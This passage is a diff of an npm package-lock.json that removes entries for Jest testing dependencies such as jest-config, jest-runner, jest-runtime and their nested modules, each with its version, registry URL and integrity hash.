"jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/babel-jest": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.4.1.tgz", - "integrity": "sha512-xBZa/pLSsF/1sNpkgsiT3CmY7zV1kAsZ9OxxtrFqYucnOuRftXAfcJqcDVyOPeN4lttWTwhLdu0T9f8uvoPEUg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.4.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.4.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/jest-config/node_modules/babel-plugin-jest-hoist": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.4.0.tgz", - "integrity": "sha512-a/sZRLQJEmsmejQ2rPEUe35nO1+C9dc9O1gplH1SXmJxveQSRUYdBk8yGZG/VOUuZs1u2aHZJusEGoRMbhhwCg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/babel-preset-jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.4.0.tgz", - "integrity": "sha512-fUB9vZflUSM3dO/6M2TCAepTzvA4VkOvl67PjErcrQMGt9Eve7uazaeyCZ2th3UtI7ljpiBJES0F7A1vBRsLZA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.4.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/jest-config/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/jest-config/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-config/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-config/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.2.0.tgz", - "integrity": "sha512-bkxUsxTgWQGbXV5IENmfiIuqZhJcyvF7tU4zJ/7ioTutdz4ToB5Yx6JOFBpgI+TphRY4lhOyCWGNH/QFQh5T6A==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.4.1.tgz", - "integrity": "sha512-QlYFiX3llJMWUV0BtWht/esGEz9w+0i7BHwODKCze7YzZzizgExB9MOfiivF/vVT0GSQ8wXLhvHXh3x2fVD4QQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "jest-util": "^29.4.1", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.4.1.tgz", - "integrity": "sha512-x/H2kdVgxSkxWAIlIh9MfMuBa0hZySmfsC5lCsWmWr6tZySP44ediRKDUiNggX/eHLH7Cd5ZN10Rw+XF5tXsqg==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.4.1.tgz", - "integrity": "sha512-akpZv7TPyGMnH2RimOCgy+hPmWZf55EyFUvymQ4LMsQP8xSPlZumCPtXGoDhFNhUE2039RApZkTQDKU79p/FiQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-leak-detector/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.4.1.tgz", - "integrity": "sha512-k5h0u8V4nAEy6lSACepxL/rw78FLDkBnXhZVgFneVpnJONhb2DhZj/Gv4eNe+1XqQ5IhgUcqj745UwH0HJmMnA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils/node_modules/diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils/node_modules/jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.4.1.tgz", - "integrity": "sha512-H4/I0cXUaLeCw6FM+i4AwCnOwHRgitdaUFOdm49022YD5nfyr8C/DrbXOBEyJaj+w/y0gGJ57klssOaUiLLQGQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.4.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.4.1.tgz", - "integrity": "sha512-MwA4hQ7zBOcgVCVnsM8TzaFLVUD/pFWTfbkY953Y81L5ret3GFRZtmPmRFAjKQSdCKoJvvqOu6Bvfpqlwwb0dQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-resolve": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.4.1.tgz", - "integrity": "sha512-j/ZFNV2lm9IJ2wmlq1uYK0Y/1PiyDq9g4HEGsNTNr3viRbJdV+8Lf1SXIiLZXFvyiisu0qUyIXGBnw+OKWkJwQ==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.4.1.tgz", - "integrity": "sha512-Y3QG3M1ncAMxfjbYgtqNXC5B595zmB6e//p/qpA/58JkQXu/IpLDoLeOa8YoYfsSglBKQQzNUqtfGJJT/qLmJg==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.2.0", - "jest-snapshot": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-resolve/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runner": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.4.1.tgz", - "integrity": "sha512-8d6XXXi7GtHmsHrnaqBKWxjKb166Eyj/ksSaUYdcBK09VbjPwIgWov1VwSmtupCIz8q1Xv4Qkzt/BTo3ZqiCeg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/environment": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.2.0", - "jest-environment-node": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-leak-detector": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-resolve": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-util": "^29.4.1", - "jest-watcher": "^29.4.1", - "jest-worker": "^29.4.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/jest-runner/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-runner/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner/node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-runner/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runner/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.4.1.tgz", - "integrity": "sha512-UXTMU9uKu2GjYwTtoAw5rn4STxWw/nadOfW7v1sx6LaJYa3V/iymdCLQM6xy3+7C6mY8GfX22vKpgxY171UIoA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/globals": "^29.4.1", - "@jest/source-map": "^29.2.0", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "semver": "^7.3.5", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/jest-runtime/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-runtime/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runtime/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runtime/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.4.1.tgz", - "integrity": "sha512-l4iV8EjGgQWVz3ee/LR9sULDk2pCkqb71bjvlqn+qp90lFwpnulHj4ZBT8nm1hA1C5wowXLc7MGnw321u0tsYA==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - 